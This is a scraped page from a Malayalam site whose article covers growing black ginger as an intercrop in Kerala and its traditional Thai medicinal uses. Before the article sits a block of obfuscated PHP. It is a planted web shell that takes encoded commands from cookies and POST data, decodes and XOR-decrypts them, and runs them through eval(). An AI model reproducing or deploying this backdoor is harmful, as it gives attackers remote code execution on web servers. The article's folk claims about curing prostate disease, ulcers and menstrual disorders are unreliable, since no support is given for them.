$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} പുതുമ തേടുന്നവർക്കായി കരിയിഞ്ചി കൃഷി; ഇടവിളയാക്കാനും ആരോഗ്യത്തിനും ഉത്തമം – Mannira

പുതുമ തേടുന്നവർക്കായി കരിയിഞ്ചി കൃഷി; ഇടവിളയാക്കാനും ആരോഗ്യത്തിനും ഉത്തമം

പുതുമ തേടുന്നവർക്കായി കരിയിഞ്ചി കൃഷി; ഇടവിളയാക്കാൻ അനുയോജ്യമായ തായ് ബ്ലാക്ക് ജിഞ്ചർ എന്ന കരിയിഞ്ചിക്ക് പതിരെ സംസ്ഥാനത്ത് പ്രചാരം കൂടിവരികയാണ്. രോഗ, കീട ആക്രമണങ്ങള്‍ കുറവായതും കേരളത്തിൽ കാണപ്പെടുന്ന ഏതുതരം മണ്ണിലും വളരുമെന്നതുമാണ് കരിയിഞ്ചിയുടെ മേന്മ. മണ്ണിലെ ജലാംശം അനുസരിച്ച് ജലസേചനം ചെയ്യാൻ ശ്രദ്ധിക്കണമെന്ന് മാത്രം.

ഉഷ്ണമേഖലയിൽ നന്നായി വിളയുന്ന കരിയിഞ്ചി കേരളം, തമിഴ്നാട്, കര്‍ണാടക സംസ്ഥാനങ്ങളിൽ നന്നായി വിളയുന്നു. പകുതി തണലുള്ള അന്തരീക്ഷത്തിൽ വളരുന്ന വിളയായതിനാല്‍ തെങ്ങിന്‍തോട്ടങ്ങളില്‍ ഇടവിളയാക്കാന്‍ കരിയിഞ്ചി അനുയോജ്യമാണ്. എന്നാല്‍ റബര്‍തോട്ടങ്ങള്‍ക്കിടയിൽ കരിയിഞ്ചി ഇടവിള കൃഷിയ്ക്ക് യോജിച്ചതല്ലെന്ന് അനുഭവസ്ഥർ പറയുന്നു.

രക്‌തശുദ്ധിക്കും, ബലിഷ്ഠമായ പേശികൾക്കുമായാണ് പരമ്പരാഗതമായി തായ് ജനത കരിയിഞ്ചി ഉപയോഗിക്കുന്നത്. ലൈംഗീക പ്രശ്നങ്ങള്‍ മാറ്റി ഉത്തേജനമുണ്ടാക്കുന്നതിനും ഇത് ഉപയോഗിക്കുന്നുണ്ട്. പ്രോസ്റ്റേറ്റ് ഗ്രന്ഥിയുമായി ബന്ധപ്പെട്ട രോഗങ്ങൾ തടന്നതിനും പെപ്റ്റിക് അള്‍സർ പോലുള്ള ഉദര പ്രശ്നങ്ങൾക്കും സ്ത്രീകളിലെ ആര്‍ത്തവ ക്രമക്കേടുകൾക്കും തായ്ലന്‍ഡില്‍ കരിയിഞ്ചി ഉപയോഗിക്കുന്നു.

അലര്‍ജികള്‍ക്കുള്ള മരുന്നായും കരിയിഞ്ചി പ്രശസ്തമാണ്. കുറഞ്ഞ താപനിലയില്‍ ഉണക്കിപ്പൊടിച്ച്‌ സംസ്കരിച്ചാണ് ഇത് ഉപയോഗിക്കുന്നത്. ആഹാരശേഷം രണ്ടു കപ്പ് കരിയിഞ്ചി വെള്ളവും അതിനുശേഷം ഒരു ടേബിള്‍സ്പൂണ്‍ വെളിച്ചെണ്ണയും രണ്ടു നേരം വീതം കഴിക്കുന്നത് ശീലാമാക്കിയവരണ് തായ്‌ലൻഡിലെ ജനങ്ങൾ.

ചെറിയ കഷണം ഉണക്കകരിയിഞ്ചി, ചായയില്‍ ഇട്ടു തിളപ്പിച്ചും ഉപയോഗിക്കുന്നുണ്ട്. എന്നാൽ കുട്ടികള്‍, ഗര്‍ഭിണികള്‍, മുലയൂട്ടുന്ന സ്ത്രീകള്‍, ഹൈപ്പര്‍ടെന്‍ഷന്‍ഉള്ളവര്‍ എന്നിവര്‍ ഇതുപയോഗിക്കാന്‍ പാടില്ല. നാലു കിലോ പച്ചയിഞ്ചിയില്‍നിന്ന് ഒരു കിലോവരെ ഉണക്കയിഞ്ചി ലഭിക്കും. ഇഞ്ചിയുടെ തൊലികളഞ്ഞ് കഴുകിയാണ് ഉണക്കേണ്ടത്.

കയറ്റുമതിക്കായി വളര്‍ത്തുന്നതിനാല്‍ കരിയിഞ്ചി ജൈവരീതിയില്‍മാത്രമേ കൃഷിചെയ്യാവൂ. ഒരു മാസം പ്രായമായ തൈകളാണ് നടാൻ ഉപയോക്കുന്നത്.ഏഴാം മാസം വിളവെടുക്കാം. ഇഞ്ചി കൃഷിചെയ്യുന്നതു പോലെതന്നെ കരിയിഞ്ചിയും ഗ്രോബാഗിലോ നിലത്തോ കൃഷി ചെയ്യാം.

Also Read: രണ്ടു വർഷം കൊണ്ട് രണ്ടു കോടി ആദായം; ക്ഷീര കർഷകനായി മാറിയ മുൻ എയർ ഇന്ത്യ ഉദ്യോഗസ്ഥൻ പറയുന്നു

Image: pixabay.com